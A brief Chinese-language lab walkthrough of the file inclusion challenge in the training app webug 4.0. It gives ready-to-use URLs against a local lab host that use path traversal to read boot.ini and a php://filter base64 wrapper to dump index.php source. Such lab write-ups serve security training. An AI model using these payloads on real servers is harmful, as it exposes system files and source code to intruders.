webug4.0-文件包含漏洞

0x01 漏洞利用

1.打开页面看见url的暗示。。

http://192.168.72.136/control/more/file_include.php?filename=../../template/dom_xss.html

2.读取boot.ini

http://192.168.72.136/control/more/file_include.php?filename=../../../../boot.ini

想要读取其他敏感文件 而不知道路径的 请看我这篇文章。

控制好路径即可。

3.查看index.php源文件

192.168.72.136/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php

 base64编码直接解密就可以看到源码了。

0x02 结语

   单

你可能感兴趣的:(WEBUG4.0通关)